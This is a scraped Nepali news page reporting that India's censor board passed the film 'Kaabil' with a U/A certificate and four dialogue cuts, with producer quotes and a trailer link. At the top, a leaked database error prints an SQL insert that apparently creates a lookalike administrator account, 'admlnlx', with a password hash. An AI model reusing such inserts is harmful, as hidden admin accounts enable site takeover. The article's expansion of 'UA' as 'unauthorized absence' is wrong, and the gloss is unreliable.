WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKRI1.XsECX4yNHhEkfDjPxpan8.o51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:19:05', '', 'admlnlx', 'admlnlx')
माघ ६ –
राकेश रोशनको चलचित्र ‘काबिल‘लाई भारतीय सेन्सर बोर्डले सामान्य ४ वटा डाइलग कटौतीसँगै ‘युए’ (अनअथोराइज्ड एबसेन्स) अर्थात् १२ वर्षसम्मका बालबालिकाले अभिभावकको निर्देशनमा मात्र हेर्न पाउने गरी स्वीकृति दिएको छ ।
सीबीएफसी स्रोतका अनुसार यो चलचित्रलाई प्रमाणित गर्न सहज थियो । स्रोतले भनेको छ, “ऋतिकको प्रायः सबै चलचित्र सफा सुघ्घर र परिवारिक हुन्छन् । यद्यपि ‘काबिल’ एक परिवर्तनको कथालाई लिएर बनाइएको चलचित्र हो । तर पनि आवश्यकताभन्दा बढी हिंस्रक छैन । यो एउटा भावनात्मक चलचित्र हो । र, यो चलचित्रलाई सबैले हेर्नुपर्छ । यो ‘गजनी’ पछाडि आएको सबैभन्दा राम्रो प्रतिशोधको कथा हो ।”
निर्माता राकेश रोशनले सेन्सर बोर्डको प्रमाणपत्रले आफू खुसी भएको बताएका छन् । रोशनले भने, “हामीलाई सेन्सर बोर्डको कटौतीमाथि कुनै आपत्ति छैन । किनकि त्यो कटौतीले कथाको प्रवाहमा कुनै असर गरेको छैन । हामी सेन्सर प्रमाणपत्रसँग खुसी छौँ ।”
हेर्नुस् ट्रेलर
https://www.youtube.com/watch?v=nubDFeiUAsI